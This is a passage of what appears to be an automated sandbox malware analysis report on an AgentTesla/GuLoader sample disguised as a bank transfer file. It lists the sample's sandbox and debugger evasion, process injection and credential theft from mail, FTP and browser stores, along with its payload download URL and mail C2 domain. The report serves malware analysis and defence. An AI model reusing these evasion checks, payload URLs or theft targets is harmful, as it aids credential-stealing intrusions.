Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797341838.0000000002CD0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: CasPol.exe, 00000004.00000002.112529856896.0000000001700000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1V_BC3ORZYO_CJEEMMYBVYNAV_UOPMTL6
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797341838.0000000002CD0000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112529856896.0000000001700000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107795131287.0000000000574000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1804

Thread sleep time: -2767011611056431s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9951

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe

System information queried: ModuleInformation

Jump to behavior

Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797397321.0000000002D99000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 00000004.00000002.112529856896.0000000001700000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1V_BC3orZyo_CjeEmMyBVynAV_UOPmtl6
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797397321.0000000002D99000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797397321.0000000002D99000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797341838.0000000002CD0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
Source: CasPol.exe, 00000004.00000002.112529238577.000000000167D000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000003.108700537691.000000000167D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWU:Z
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797397321.0000000002D99000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797397321.0000000002D99000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000004.00000002.112529238577.000000000167D000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000003.108700537691.000000000167D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797341838.0000000002CD0000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112529856896.0000000001700000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797397321.0000000002D99000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: CasPol.exe, 00000004.00000002.112528721290.000000000160B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW8Zh
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797397321.0000000002D99000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107795131287.0000000000574000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Transferencia_29_11_2021 17.03.39.exe, 00000002.00000002.107797397321.0000000002D99000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000004.00000002.112531303198.0000000003209000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 4_2_012A6950 LdrInitializeThunk,

4_2_012A6950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1390000

Jump to behavior

Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe"

Jump to behavior

Source: CasPol.exe, 00000004.00000002.112530858287.0000000001DB0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 00000004.00000002.112530858287.0000000001DB0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: CasPol.exe, 00000004.00000002.112530858287.0000000001DB0000.00000002.00020000.sdmp	Binary or memory string: Program Manageru
Source: CasPol.exe, 00000004.00000002.112530858287.0000000001DB0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 3940, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 3940, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 3940, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Process Injection112	Masquerading1	OS Credential Dumping2	Security Software Discovery421	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel21	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	Credentials in Registry1	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion341	Security Account Manager	Virtualization/Sandbox Evasion341	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol123	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Information Discovery115	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Transferencia_29_11_2021 17.03.39.exe	25%	Virustotal		Browse
Transferencia_29_11_2021 17.03.39.exe	9%	ReversingLabs	Win32.Downloader.GuLoader

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.Transferencia_29_11_2021 17.03.39.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082		Download File
2.0.Transferencia_29_11_2021 17.03.39.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140082		Download File

Domains

Source	Detection	Scanner	Label	Link
csavarcsapagyexpress.hu	0%	Virustotal		Browse
mail.csavarcsapagyexpress.hu	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	Virustotal		Browse
https://sectigo.com/CPS0	0%	Avira URL Cloud	safe
http://rTgNdy.com	0%	Avira URL Cloud	safe
http://go.micF.	0%	Avira URL Cloud	safe
http://x7N6F9gC7jnN7HPYuUB7.net	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
csavarcsapagyexpress.hu	185.111.89.226	true	true	0%, Virustotal, Browse	unknown
drive.google.com	142.250.185.78	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.97	true	false		high
doc-08-6k-docs.googleusercontent.com	unknown	unknown	false		high
mail.csavarcsapagyexpress.hu	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-08-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/q217t7l1ccsuj5vlu8k9v7g15blolesf/1638382200000/11612195336931281153/*/1V_BC3orZyo_CjeEmMyBVynAV_UOPmtl6?e=download	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	CasPol.exe, 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	CasPol.exe, 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	CasPol.exe, 00000004.00000002.112540848121.000000001E71E000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112538365456.000000001E2D9000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://rTgNdy.com	CasPol.exe, 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-08-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/q217t7l1	CasPol.exe, 00000004.00000003.107766671407.0000000001696000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112529238577.000000000167D000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000003.107766618786.0000000001691000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.107766583519.0000000001689000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.108700537691.000000000167D000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000003.107772204438.0000000001690000.00000004.00000001.sdmp	false		high
http://go.micF.	CasPol.exe, 00000004.00000003.107779643806.000000001E286000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://x7N6F9gC7jnN7HPYuUB7.net	CasPol.exe, 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112541174009.000000001E74A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	CasPol.exe, 00000004.00000002.112539654959.000000001E611000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	CasPol.exe, 00000004.00000002.112528721290.000000000160B000.00000004.00000020.sdmp	false		high
https://doc-08-6k-docs.googleusercontent.com/	CasPol.exe, 00000004.00000003.107766671407.0000000001696000.00000004.00000001.sdmp, CasPol.exe, 00000004.00000002.112528985934.0000000001647000.00000004.00000020.sdmp, CasPol.exe, 00000004.00000003.107772204438.0000000001690000.00000004.00000001.sdmp	false		high
https://doc-08-6k-docs.googleusercontent.com/F	CasPol.exe, 00000004.00000002.112528985934.0000000001647000.00000004.00000020.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	CasPol.exe, 00000004.00000003.107766671407.0000000001696000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.78	drive.google.com	United States	15169	GOOGLEUS	false
185.111.89.226	csavarcsapagyexpress.hu	Hungary	51013	WEBSUPPORT-SRO-SK-ASSK	true
142.250.185.97	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532136
Start date:	01.12.2021
Start time:	19:08:05
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Transferencia_29_11_2021 17.03.39.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@4/1@3/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 94% Number of executed functions: 99 Number of non-executed functions: 28
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
